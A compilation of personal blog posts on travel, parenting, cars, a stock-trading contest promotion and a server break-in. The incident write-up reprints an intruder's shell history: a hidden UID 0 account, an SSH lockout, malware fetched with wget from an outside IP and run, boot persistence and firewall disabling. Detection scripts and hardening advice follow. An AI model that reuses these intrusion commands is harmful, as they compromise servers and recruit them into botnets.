Going Almost Viral On Facebook – Yusuf Taiyoob Meme

Almost viral? Isn’t that like almost famous, or almost rich? Yah it’s not famous, or rich or in this kind viral (even though it kinda is). Anyway.

I make funny videos on instagram sometimes, I made a bunch in Europe in different countries (I meant to do one for each country, but yah I failed at that). You can see them on Instagram with the hashtag #daviesfunnyvids.

So I always knew the formula for success was a white dude speaking BM, so I did a video in that format around Hari Raya because the Yusuf Taiyoob adverts on the radio are too hilarious. If you’re not familiar, they are near pornographic.

The most famous Yusuf Taiyoob meme image would be this one I guess:

Yusuf Taiyoob

Anyway I did my video about this, and it was kinda popular. It was ok on Instagram but it got a little bit wild on Facebook.

Ending up with over 600 likes, over 250 comments and over 1300 shares. Not too bad right, I thought it could have gotten much more but I just don’t have that kind of audience.

But then someone stole it, who did have the right kind of audience, guess what happened? Yah it went nuts haha with almost 16,000 likes and almost 6000 shares but no credit back to me and it wasn’t shared from the original video (they basically downloaded it, then re-uploaded on their own page).

Stolen Viral Video

What can I do? Nothing really, just enjoy the fact that I did get some kind of popularity from the video haha. I still have about 400 pending friend requests from that period.

There were even some people meme-ing me, as apparently to every Malay person I look like the WWE wrestler Big Show. Yah every time I buy a Ramly burger, it’s almost guaranteed the chap selling the food will say “Wah, abang macam big show lehh”.

Big Show Makan Kurma

So yah, it was fun, it was interesting, I shall have to think of more funny videos that I can do speaking BM.

That was my 20 minutes of fame I guess.


Learn Stock Trading – It Can Be Fun!

I’ve always had a certain interest in stock trading and finance and always wanted to learn stock trading, learn more about how it works, how to benefit from it etc. But most of the resources about it are dry, tedious and cover fascinating topics like technical analysis.

I have some investments in the stock market, but not directly, via a Unit trust. And I do have some investment in Gold, which of course is a completely different market to stocks (with its own challenges). I do like numbers though and challenges, so throughout the years I’ve always been picking up knowledge here and there about the different types of investments and trading (futures, forex, stocks, shares etc).

Learn Stock Trading

I even bought this book more than 10 years ago, but it put me to sleep every time I tried to read it. And all the new language to learn (bullish, bid size, ask size, ask price, percentage spreads, closed-end funds etc).

Financial Times Book

It can be quite a daunting subject to learn about, and of course it concerns money so people’s first instinct is to play it safe. So yah, that didn’t help much.

Now I have a child, I have to think about his future too, and of course it’s important to me that he be financially smart and make informed choices on what to do with his resources. What I found recently was an interesting online virtual trading challenge based around real-time data from Bursa Malaysia by KenTrade by Kenanga.

It simulates real equity market trading very closely and can demonstrate it’s not actually that complex, with the added bonus if you do find yourself really good at it – you can win yourself a Volkswagen Jetta worth RM130,888. And well, how else are you going to get to trade with RM1 Million? Haha.

KenTrade by Kenanga

You don’t have to be top to get something too, if you are one of the top 66 participants with the highest percentage growth in your virtual portfolio, you stand the chance to win a cash prize (to get the car you have to be in the top 20).

You don’t have to be top to get something too. If you are one of the top 33 participants in the public and student category respectively with the highest percentage growth in your virtual portfolio, you stand the chance to win a cash prize (to get the car you have to be in the top 10 in these categories).

If you do wanna try it out, head over to https://game1.kentrade.com.my/KenTradeGame/ and sign up for the Kentrade Trading Challenge by Kenanga or you can head over to https://www.kentrade.com.my/KenTrade/ to find out more.

Contest runs from October 13 to November 7, while registration ends on October 20. Upon signing up, send a screenshot of your registration and quote ‘ShaolinTiger’ over to KenTrade@kenanga.com.my and stand a chance to win a mystery prize!


Bangkok – Our Favourite City in Asia? And Some Tips

So yah, Bangkok..I was supposed to write this post back in 2011 sometime I guess haha, I started with 1 picture in October 2011 but it got kinda stuck there.

We really love Bangkok, we’ve been back a couple of times since – but this was our first trip so it was kind of special and it was a surprise birthday trip for Kim as well. I was trying to be more romantic, proactive etc as I was a bit of a bum most of the time haha. Plus she’d mentioned MANY times she wanted to go shopping there, check out Chatuchak etc.

Anyway I decided on Bangkok as I’d heard so many good things about it, we’d both been to Thailand and absolutely loved the food and people there but we’d never really explored Bangkok properly, and definitely not together so I went for it, I booked with AirAsia go and chose a cute boutique-ish hotel bang in the middle of Chinatown called Shanghai Mansion.

Bangkok has a whole bunch of cute and quirky hotels at reasonable prices, so do have a look outside of the chains for something different.

Anyway we arrived safely and checked in, and we were hungry, seeing as it was the birthday girl’s weekend I let her choose what to eat…she chose to eat a whole suckling pig right next to the hotel and it was AWESOME. You can see her post about it here – The suckling pig in Bangkok.

Roast Suckling Pig

It was a bit different from the style we get here in Malaysia, it was nice but honestly we preferred how they do it here. The cool part was though they stir fried the rest of the meat with salt and pepper, which made a delicious dish to eat with our rice/veges.

We lucked out staying in Chinatown too and discovered one of our absolute favourite restaurants in Bangkok just walking distance from our hotel, more here – T&K Seafood in Bangkok’s Chinatown.

What we really adore about Thailand and especially Bangkok is the street food, it’s EVERYWHERE, it’s cheap, there’s loads of pork and it seems impossible to have a bad meal in Thailand. I mean just look at how amazing their chap fan/mixed rice is:

Thailand Mixed Rice

One thing you fast learn about Bangkok is, stick to taxis if you want to get somewhere in comfort. Taking a tuk tuk is fun, but only do it for that reason. A tuk tuk is not really any cheaper than a taxi (unless you’re perhaps a local), there’s no aircon, if it rains it sucks, if you get stuck behind something spewing diesel fumes it sucks and they will constantly hassle you to make ‘stops’ to help them out.

Every stop you make will reduce your fare by 20-40baht but take about 10-20 minutes each time, it’s worth doing once maybe just for fun. We actually did 3 stops just for shits and giggles and got the tuk tuk ride for free.

Tuk Tuk ride

But if you want to get anywhere just take a taxi, another important lesson to note – ALWAYS hail a moving cab, never take one parked at the road side (they tend to be the lazy, unscrupulous drivers).

As far as food goes there are a few dishes you absolutely must try the authentic versions of in Thailand, one is Pad Kra Pao (or Krapow) which is basically minced pork fried with loads of basil – super delicious. This one was inside Chatuchak market:

Pad Kra Pao

The other is of course braised pig leg rice which you can find everywhere and the good ones will simply blow your mind. Talking of Chatuchak, the place is immense and there’s a LOT of people, if I can give you one tip for Chatuchak it is – if you see something you like, just buy it, because the chance of you being able to locate the same stall again is slim to none.

Chatuchak Market

The birthday girl had a great time shopping of course and LOVED Chatuchak market as expected.

Kimberlycun at Chatuchak

The other place we’d heard a lot about was Platinum Mall so we spent a day there to check it out. Talking of stewed pork leg, the one at the Platinum Mall food court is definitely one of the best ones I’ve had, so if you do head there – check it out!

Platinum Mall - Bangkok

Platinum mall is like a smaller, more comfortable version of Chatuchak with aircon and much easier to navigate. The major downside I noticed was there’s very little men’s stuff in Platinum, compared to Chatuchak which also has other interesting sections (home, gardens, pets etc).

But the shopping experience at Platinum is much less sweaty and the food in the food court is tops! But even then, we still headed back to Chatuchak the next day for another go haha, and we managed to locate the legendary coconut ice cream, another memorable food from BKK.

Chatuchak Coconut Ice-cream

So yah that sums up Bangkok pretty much, shop, food, shop, food, massage, pass out – wake up and repeat. Super awesome!

Kinda miss Bangkok actually, can’t wait to take Liam there! Although now I’m older, I kind of enjoy the serenity of Bali too. Ah so many places to go…haven’t even been to Japan at all yet!


What It’s Like To Be The Father Of A Premature Baby (Premie)

Pregnancy itself is a roller-coaster, even the ideal pregnancy I would imagine is quite a stressful experience for the first time parents (especially the one with a tiny human growing in her belly). We honestly did not have the easiest pregnancy, at some points it was downright terrifying – especially seeing blood during the exact time when we were supposed to announce to the World that we were having a baby. The magical 3 months mark – Red tide.

And yes it happened again in May, not a good sign, but nothing we could do – nothing the Doctor could tell us..and upon reading far too much, is fairly normal (happens to about 20% of pregnant women). The only bad part, was it’s a fairly strong indicator of premature birth.

There’s 2 things in life I really strongly dislike, complaining and worrying (almost the same thing in fact..). Worry is pointless, if you can do something about it, do it. If you can’t, worrying isn’t going to change anything. Same for complaining, don’t complain, do something to change it, fix the situation, take action – don’t just whinge.

A lot of it can be alleviated by knowledge anyway, read, read, educate yourself and it becomes a lot easier to not worry (or the opposite sometimes when you read too much). Anyway, that’s my philosophy in life and I had to work extra hard to maintain it at certain points during the pregnancy, as it wasn’t an easy one in general.

On the whole it was wonderful though, Kim felt great and she was a glowing, beautiful, vibrant surprise pregnant lady (we consider a surprise mom when you see a hot chick from the back and she turns to the side or around and boom there’s a massive baby bump). She had very few serious symptoms, some morning sickness early on, no really crazy cravings, not much pain/discomfort. Other than the blood etc, it was a textbook pleasant pregnancy.

It was pretty stressful though, every day without blood was a blessing. Then things escalated fairly quickly, 11th July (around 29 weeks gestation) we had ‘The Show’ which is technically the body of the mother saying it’s ready to party, let’s get the baby out. I saw what looked an awful lot like a mucus plug (yes I Google Imaged it..I don’t recommend doing that).

This is when I started reading voraciously about all kinds of symptoms, probabilities, birth stages (micro preemies, early preemies, moderately premature etc etc), and was hoping we could make it to at least 34-35 weeks gestation as our little man would be pretty much fully developed by then and fairly well equipped to come out.

After ‘The Show’ we went to A&E and called our Doctor in to check things out, she said the cervix was a little soft and having a look at the picture of the mucus plug..she said it did very much look like a show and we needed to take precautions for premature birth – which is basically 2 steroids shots 12 hours apart to help along the lung development of the little one when he comes out.

As far as babies go, all systems are pretty much go from 28 weeks onwards, but the lungs are last to develop and be ready to take in outside air. Preemie lungs have issues due to a lack of surfactant which basically lubricates all the little tubes and stops them collapsing.

Most premature babies are born with some kind of respiratory distress (which is why you see them on breathing apparatus). Anyway the earliest preemie stage which is unlikely to have any serious long term effects is 32 weeks, also has a 98% survival rate – which is good obviously.

Anyway after the steroid shots Kim just took it easy and was pretty much on bed rest, not moving a whole lot. We were just hoping and praying (in a non-religious way) that he would stay in as long as possible, as the last few weeks of gestation are when there is exponential growth and development of the body, brain, immune system, nervous system and much more.

So yah, July 30th I was supposed to go to the office, but Kim didn’t seem to be feeling too well, and I just had a bad feeling and thought I should stay at home. Lucky I did as the missus stayed in bed all day, she went to pee around 5pm and I heard a scream from upstairs.

I rushed up and found a wet floor..which I examined closely (yes I smelt it)…you smell it to make sure it’s not pee, to make sure it has no foul smells and you check it to make sure it’s clear and has no black/green tint. A black/green tint would indicate the baby is not coping well and needs to come out ASAP (emergency C-section).

The water had broken, but it didn’t seem to be a lot..you can read this part from Kim’s perspective too here: I have popped and this is how it went down..

Anyway, however little or much water broke (I suspected it was the hind waters, not the main sack) we rushed to the hospital and went straight into a labour room. I read up and found the probability of going into labour in the next 24 hours was 50% or higher. I was hoping we were in the other 50% that could go 4-6 weeks with a drip/leak/hind water burst as amniotic fluid does constantly regenerate and after an ultrasound the main sac was still full.

Stay positive and all that, I hung out in the hospital till about 3am then went home to get some sleep. There were no contractions or major dilation (around 1cm) so we were hopeful that he could stay in until at least 36 weeks.

But no, he wasn’t having any of it. I got a panicked call from Kim around 10am saying it was on, she was having major contractions and they’d started at about 5.30am and were getting closer and stronger.

I decided I should probably go into the hospital, so I packed the bag full of stuff we might need and off I went.

It was all very sudden, we seriously had nothing ready – we had a stroller and a car seat I bought because I saw the exact model we wanted on sale. But literally nothing else, no clothes, no diapers, no cot, nothing.

I got to the hospital and Kim was already super drowsy from the gas and air she was sucking on like a crack pipe, she wouldn’t let it go. I have to say, that contraction business looks bloody painful. By about 11am she was screaming for an epidural, but the Doctor said it was too late, she was already 6cm dilated (so 60% of the way there), her contractions were too close together and she was progressing that fast it was going to be over soon anyway.

She was grabbing my hand so hard my fingers almost dropped off (ribena purple they were), but hey, I was happy to bear that rather than pooping out a 2kg human from any of my body orifices.

Things went pretty fast and our son was born pretty smoothly at 1.52pm July 31st 2014 without complications at 32 weeks 4 days (other than him being almost 8 weeks early) his due date was September 22nd. So yah, he was supposed to be born yesterday (relative to when this post was written).

But as someone so wonderfully put it, this way we get to spend an extra 2 months with him!

Seeing your wife give birth naturally (or even cesarean I would imagine) is not an experience for the faint hearted, government hospitals no longer let the fathers be present during birth as they just don’t have enough resources to deal with all the fainting/puking etc.

Thankfully my constitution is ok I think as I managed to stay conscious throughout the entire thing, and didn’t puke and even took some pictures of ‘that’ moment. Although I wasn’t exactly looking directly, so I think they are blur/overexposed haha.

This is how he looked when he was born, covered in the waxy vernix layer, goo and blood having any residual amniotic fluid/gunk sucked out of his nose/mouth with a tube wrapped in a plastic bag to keep him warm. The first thing he did? Peed on the nurse – good lad! Not exactly cute at this stage tho.

32 Week Old Premature Baby

Kim was fine afterwards just tired, she had a sleep and I went to see baby Liam in NICU (neonatal intensive care unit) where we spent many hours for the next 3 and a half weeks. More about that later, I took her up to see him the same day so they could meet the day he was born. We couldn’t hold him yet though as he was still on the CPAP machine (Continuous Positive Airway Pressure) as he did have some respiratory distress.

So the first time mommy and me could hold him was the first day after his birth. He even opened his eyes a bit and grabbed my finger like a little boss, we were so proud that he was already off the CPAP and onto the regular nasal prongs. Far cuter, like a little wrinkly old man.

32 Week Preemie

So yah, that’s the story of our pregnancy and birth from my perspective, and the first thoughts/feeling of being the father of a premature baby. My #32weeker :)

If you want to see far too much of him, just follow me on Instagram @ShaolinTiger and his Mommy at @Kimberlycun.


Advanced Information Gathering AKA Google Hacking at HITB 2004

So this was the first real talk I gave, I’d just moved to Malaysia not long beforehand and I’d started work at NSS as the lead for the penetration testing team. We were a sponsor of Hack in the Box 2004 so we got a speakers slot, but it couldn’t be a product/company pitch it had to be a proper infosec/technical talk which passed the regular CFP (Call for paper) requirements.

It was decided that I give the talk..I was very nervous as you can imagine, even back then it was rather a large conference, and this was my first real shot at talking. Looking back at the slides 10 years later though, I think I did a pretty good job – much of the information is still relevant today.

And when I gave the talk the room was packed, people were standing and listening. I think because it was actually one of the less technical talks, more people could enjoy it – it went down really well. The subject was something I did at work, and often the first stage in a penetration test – information gathering. Arguably it’s also the most important phase as it gives you all the entry points and people to target in later phases. The hot keywords at that time were Google Hacking and the GHDB (Google Hacks Database).

Information Gathering AKA Google Hacking

It was about 6 years after this that I gave my next talk, not sure why – perhaps just lack of opportunity. I also did an interview with The Star afterwards titled Guarding against Google hacking, where I met Chris Chong.

Google Hacking - The Star

The talk covers the lesser known aspects of Google, tools such as Athena and Sitedigger and the amount of random misconfiguration that can be found with a little careful search engine manipulation. Other useful public databases will be covered with some details on how to leverage the maximum amount of detail on any given target.

Also an introduction to the Google API and how it can be used or abused during a penetration test or hack attempt. This presentation will include a live demonstration in which the above techniques will be used to gather coveted information about both random and targeted organizations.

So here are the slides:

And the video (yah we had recordings back then, shared via Torrent!):

Enjoy!

You can see all my talks given here.


An Anatomy Of A Hack – Weak ROOT Password

So a peaceful Sunday night, I get an odd bandwidth warning for a development/testing server that a developer recently created. It was doing some fairly immense traffic, peaking at 80mb a second and averaging about 8mb/s – definitely not normal.


I tried to access the server via SSH but couldn’t connect at all, port 22 was connection reset by peer (which indicates a block or drop) and our normal port wasn’t responding at all.

I accessed the server via the Linode LISH console, but it wasn’t accepting any of our secure passwords, so I shut it down and used the Linode manager to reset the root password. This then allowed me to boot it up and access it via LISH with the root user.

What I discovered next was the reason why I couldn’t SSH in either on port 22 the default port, or our regular SSH port (which is not 22). I could see from these lines in the .bash_history for root that SSH had been blocked for everyone except 2 IP addresses.

    9  echo "sshd:121.12.168.62"  >> /etc/hosts.allow
   10  echo "sshd:37.48.73.19"  >> /etc/hosts.allow
   11  echo "sshd:ALL"  >> /etc/hosts.deny

These are TCP wrappers rules, and together they would prevent any SSH access at all from any other address.

So they logged in, created a user called restart (with UID 0 and the password restart, so effectively a second root account), blocked everyone but 2 IP addresses from accessing via SSH, then downloaded a piece of malware (or what I assume to be a botnet client) from the first IP address http://121.12.168.62:6789/com

Then they ran this, made the file immutable with chattr +i, and added it to /etc/rc.local (along with a line that stops iptables) to make sure it runs on restart. Here’s the full history:

    1  w
    2  uname -a
    3  ethtool eth0
    4  ifconfiog
    5  ifconfig
    6  last
    7  useradd -g 0 -u 0 -o restart
    8  echo restart:restart |chpasswd
    9  echo "sshd:121.12.168.62"  >> /etc/hosts.allow
   10  echo "sshd:37.48.73.19"  >> /etc/hosts.allow
   11  echo "sshd:ALL"  >> /etc/hosts.deny
   12  cd /tmp/scp
   13  ls
   14  chmod 777 *
   15  ./x 5.153
   16  ls
   17  chmod 777 *
   18  ./x 5.153
   19  cd /etc
   20  wget http://121.12.168.62:6789/com
   21  chmod 0755 com
   22  ./com &
   23  chattr +i com
   24  echo "cd  /root/">>/etc/rc.local
   25  echo "./com&">>/etc/rc.local
   26  echo "/etc/init.d/iptables stop">>/etc/rc.local
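
The history above leaves three kinds of artefact on disk: a second UID 0 account, TCP wrappers rules for sshd, and new lines in /etc/rc.local. As an added example (not part of the original post), this Python script checks a filesystem root for them; the function names are hypothetical and the sample files are constructed to mirror the history.

```python
import os
import re
import tempfile

# Constructed files modelled on the history above (not copied from the server).
SAMPLE_FILES = {
    "etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                  "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
                  "restart:x:0:0::/home/restart:/bin/sh\n",
    "etc/hosts.allow": "# constructed\nsshd:121.12.168.62\nsshd:37.48.73.19\n",
    "etc/hosts.deny": "sshd:ALL\n",
    "etc/rc.local": "#!/bin/sh\ncd  /root/\n./com&\n/etc/init.d/iptables stop\n",
}

RC_PATTERNS = [
    (re.compile(r"&\s*$"), "starts a background process"),
    (re.compile(r"\b(iptables|ufw|firewalld)\b.*\b(stop|disable)\b"),
     "disables the firewall"),
]


def read(root, rel):
    """Read a file below root; a missing file counts as empty."""
    try:
        with open(os.path.join(root, rel), encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except FileNotFoundError:
        return ""


def uid0_accounts(passwd_text):
    """Accounts other than root whose UID is 0 (what `useradd -u 0 -o` creates)."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and fields[2] == "0" and fields[0] != "root":
            names.append(fields[0])
    return names


def sshd_rules(text):
    """Client lists of hosts.allow / hosts.deny rules that apply to sshd."""
    clients = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split("#", 1)[0].split(":")]
        if len(parts) < 2:
            continue
        daemons = re.split(r"[\s,]+", parts[0])
        if "sshd" in daemons or "ALL" in daemons:
            clients.append(parts[1])
    return clients


def rc_local_findings(text):
    """rc.local commands that background a process or stop the firewall."""
    hits = []
    for line in text.splitlines():
        cmd = line.strip()
        if not cmd or cmd.startswith("#"):
            continue
        for pattern, why in RC_PATTERNS:
            if pattern.search(cmd):
                hits.append((cmd, why))
    return hits


def audit(root="/"):
    """Collect the indicators from the files below root."""
    deny = sshd_rules(read(root, "etc/hosts.deny"))
    return {
        "uid0_accounts": uid0_accounts(read(root, "etc/passwd")),
        "ssh_allow": sshd_rules(read(root, "etc/hosts.allow")),
        # sshd denied to everyone outside the allow list: the lock-out in the post
        "ssh_locked_down": "ALL" in deny,
        "rc_local": rc_local_findings(read(root, "etc/rc.local")),
    }


def write_sample_tree(root):
    """Write the constructed sample files below root."""
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        write_sample_tree(tmp)
        for key, value in audit(tmp).items():
            print(key, "=>", value)
```

Call `audit("/")` on a live host, or pass the mount point of a disk image. The immutable flag set by `chattr +i` is not covered here; `lsattr` lists it.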

I uploaded the malware to VirusTotal to scan it and see what it turned up:

VirusTotal Scan

The only decent description I found was from Telus:

Backdoor.Linux.Ganiw.A is a Backdoor and Bot agent that targets the Linux platform. The malware contacts a remote server, identifying itself, and sending system information. In addition, it receives control commands to perform various nefarious activities on the infected system. Moreover, the malware has the capabilities to embark on different types of DoS attacks. To survive a system reboot, it adds an entry to the initialization directory “/etc/init.d”.

As for the actual entry, it seems like the password was popped by a different IP address (also from China), and then later on the same day, it was logged into by the main IP address from the history above, 121.12.168.62.

Aug 30 01:46:43 li737-216 sshd[20132]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:46:45 li737-216 sshd[20134]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:46:47 li737-216 sshd[20134]: Failed password for root from 60.172.228.102 port 4670 ssh2
Aug 30 01:46:58 li737-216 sshd[20134]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4670 ssh2]
Aug 30 01:46:58 li737-216 sshd[20134]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:00 li737-216 sshd[20136]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:01 li737-216 sshd[20136]: Failed password for root from 60.172.228.102 port 4526 ssh2
Aug 30 01:47:12 li737-216 sshd[20136]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4526 ssh2]
Aug 30 01:47:12 li737-216 sshd[20136]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:14 li737-216 sshd[20138]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:15 li737-216 sshd[20138]: Failed password for root from 60.172.228.102 port 3781 ssh2
Aug 30 01:47:25 li737-216 sshd[20138]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 3781 ssh2]
Aug 30 01:47:25 li737-216 sshd[20138]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:27 li737-216 sshd[20140]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:29 li737-216 sshd[20140]: Failed password for root from 60.172.228.102 port 4405 ssh2
Aug 30 01:47:39 li737-216 sshd[20140]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4405 ssh2]
Aug 30 01:47:39 li737-216 sshd[20140]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:41 li737-216 sshd[20144]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:44 li737-216 sshd[20144]: Failed password for root from 60.172.228.102 port 1662 ssh2
Aug 30 01:47:54 li737-216 sshd[20144]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 1662 ssh2]
Aug 30 01:47:54 li737-216 sshd[20144]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:55 li737-216 sshd[20146]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:57 li737-216 sshd[20146]: Failed password for root from 60.172.228.102 port 4220 ssh2
Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from 60.172.228.102 port 4220 ssh2

Then the login:

Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from 60.172.228.102 port 4220 ssh2
Aug 30 10:17:56 li737-216 sshd[21293]: Accepted password for root from 121.12.168.62 port 3117 ssh2
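
One way to catch this pattern automatically, as an added example that is not from the original post: count failed sshd password attempts per source address, including syslog's "message repeated" lines, and alert when a login is accepted from an address over a threshold or as root with a password. The sample lines are copied from the log excerpt above; the function name and the threshold of 5 are assumptions.

```python
import re

# Lines copied from the log excerpt in the post.
SAMPLE_LOG = """\
Aug 30 01:47:41 li737-216 sshd[20144]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:44 li737-216 sshd[20144]: Failed password for root from 60.172.228.102 port 1662 ssh2
Aug 30 01:47:54 li737-216 sshd[20144]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 1662 ssh2]
Aug 30 01:47:57 li737-216 sshd[20146]: Failed password for root from 60.172.228.102 port 4220 ssh2
Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from 60.172.228.102 port 4220 ssh2
Aug 30 10:17:56 li737-216 sshd[21293]: Accepted password for root from 121.12.168.62 port 3117 ssh2
""".splitlines()

# Anchoring on "sshd[pid]: " keeps text inside a user name from matching.
FAILED = re.compile(
    r"sshd\[\d+\]: (?:message repeated (\d+) times: \[ )?"
    r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED = re.compile(
    r"sshd\[\d+\]: Accepted (\S+) for (\S+) from (\S+) port \d+")


def find_suspicious_logins(lines, threshold=5):
    """Return one alert per accepted login that looks like a guessed password."""
    failures = {}          # source address -> failed password attempts so far
    alerts = []
    for line in lines:
        m = FAILED.search(line)
        if m:
            # "message repeated N times" stands for N further identical lines
            count = int(m.group(1)) if m.group(1) else 1
            failures[m.group(3)] = failures.get(m.group(3), 0) + count
            continue
        m = ACCEPTED.search(line)
        if not m:
            continue
        method, user, ip = m.groups()
        prior = failures.get(ip, 0)
        reasons = []
        if prior >= threshold:
            reasons.append("accepted after %d failed attempts" % prior)
        if user == "root" and method == "password":
            reasons.append("password login as root")
        if reasons:
            alerts.append({"time": line[:15], "user": user, "ip": ip,
                           "prior_failures": prior, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_logins(SAMPLE_LOG):
        print(alert["time"], alert["ip"], alert["user"], "; ".join(alert["reasons"]))
```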

As a rule I disable root login via SSH, move it to a different port (not 22), disable password based logins, and use a limited list of users that can access SSH. This makes it pretty secure and can be done with the following SSH settings:

Port 888
PermitRootLogin no
PasswordAuthentication no
AllowUsers YOURALLOWEDUSER

Then restart SSHd of course. Generally choose a port below 1024, as then it’s still a privileged port and can’t be hijacked by a non-root user (for the paranoid).
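
An added check for these four settings (example code, not from the original post): it reads the global part of an sshd_config and reports where the effective value differs from the list above. It assumes no Include files and ignores anything inside Match blocks; sshd uses the first value it sees for most keywords, while Port and AllowUsers lines accumulate, so hardening lines appended to the end of a file can be silently overridden. The weak sample config is constructed.

```python
import re

# The settings from the post; port and user name are the post's placeholders.
POST_SETTINGS = """\
Port 888
PermitRootLogin no
PasswordAuthentication no
AllowUsers YOURALLOWEDUSER
"""

# Constructed example: hardening lines appended below older, weaker ones.
WEAK_CONFIG = """\
# constructed sshd_config
PermitRootLogin yes
Port 22
PasswordAuthentication no
PermitRootLogin no
"""

ACCUMULATING = {"port", "allowusers"}   # repeated lines add to the list


def global_settings(text):
    """Parse the global section of an sshd_config (stops at the first Match)."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()                 # keywords are case-insensitive
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            break
        if key in ACCUMULATING:
            settings.setdefault(key, []).extend(value.split())
        elif key not in settings:              # first value wins
            settings[key] = value
    return settings


def check(text):
    """List the ways a config falls short of the four settings in the post."""
    s = global_settings(text)
    problems = []
    ports = s.get("port", ["22"])              # no Port line means port 22
    if "22" in ports:
        problems.append("port: still listening on 22")
    for key in ("permitrootlogin", "passwordauthentication"):
        value = s.get(key)
        if value is None:
            problems.append("%s: not set, built-in default applies" % key)
        elif value.lower() != "no":
            problems.append("%s: effective value is %r" % (key, value))
    if not s.get("allowusers"):
        problems.append("allowusers: no user allow-list")
    return problems


if __name__ == "__main__":
    for name, cfg in (("post settings", POST_SETTINGS), ("weak config", WEAK_CONFIG)):
        print(name, "=>", check(cfg) or "ok")
```

`sshd -t` validates the file before a restart, and `sshd -T` prints the configuration sshd will actually use.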

This server was only 11 days old, fortunately it has nothing important on it and doesn’t have access to anything else. Just be warned, even if you are disabling root login later, put a secure password in from the start..as you might forget about the server for a while.

And then it’ll get owned by some Chinese hacker and turned into part of their botnet for hire.

There’s really not ever any excuse to have a weak root password.


Oldskool Car Porn: The 1990 Lotus Carlton

I can never forget this car, seriously. My uncle drove a lot for work, I never knew exactly what he did, but he was the first person I knew that owned a laptop. He worked in some kind of manufacturing industry and was possibly a rep/salesman.

Which suits this car, well the original version anyway – the rather boring Vauxhall Carlton (along with the Ford Sierra) was a stock 90s salesman car.

1986 Vauxhall Carlton

Certainly not the most exciting car on the block. Until 1990 anyway.

I remember my uncle was looking for a new car and I happened to join him as he’d found a Lotus Carlton he’d like to look at, he didn’t know much about the car, and well nor did I. There wasn’t a whole lot of Internet back then, and there certainly wasn’t the abundance of information on sites like Wikipedia. It just so happened the car he wanted to look at was near where I lived, so he was coming down from Birmingham to have a look. I’d guess this was probably around 1992-1994 period, so the car was likely new, or barely used (1-2 years old).

When I saw it, I was like..is that it? I was pretty underwhelmed to be honest. For a £48,000 car (which was an enormous amount of money back then).

Lotus Carlton

Even the interior was kind of drab, dull and plasticy. It just had the odd Lotus emblem here and there.

Lotus Carlton Interior

Little did I realise this was a 377bhp, 3.6L twin turbo BEAST which could reach 100mph (160km/h) in less than 17 seconds. So we sat in it, took it for a test drive. It seemed fairly ordinary as we tootled around, then we reached the sliproad to the motorway.

We weren’t going slow, my uncle was in third gear as he reached the merge and he accelerated hard to pull onto the motorway at a decent speed (as you would)..the car span its wheels like a drag bike on a leash.

And once it found grip…it pressed my head so hard into the back of the seat I thought my eyeballs were going to collapse. It was quite an eye watering ride.

And yah, at that point I realised this car was really something special. I read whatever I could about it and was amazed to find that it could outperform the top supercars of that era like the Ferrari Testarossa which could do 0-60mph in only 5.3 seconds and had a top speed of 180mph (only 3 mph more than the Carlton!).

For a 4 door sedan..full of people, speeding along like a bullet train. Quite a crazy (and scary) proposition. Also the fact that it was a target for car thieves and criminals as the police didn’t have any cars fast enough to chase it made it a little impractical.

Sadly my uncle didn’t buy the car, so I didn’t get to sit in it (or any other) ever again. There were only 320 Lotus Carltons released in the UK, so it is a rare car. Even now, 20+ years later they are fetching good money for mint condition examples (£12-20,000).

There is a modern day equivalent or a spiritual successor (in some ways), the Vauxhall VXR8.

But yah, something I still remember so vividly from my younger years. Some videos for reference..

Fifth Gear Vauxhall VXR8 vs Lotus Carlton

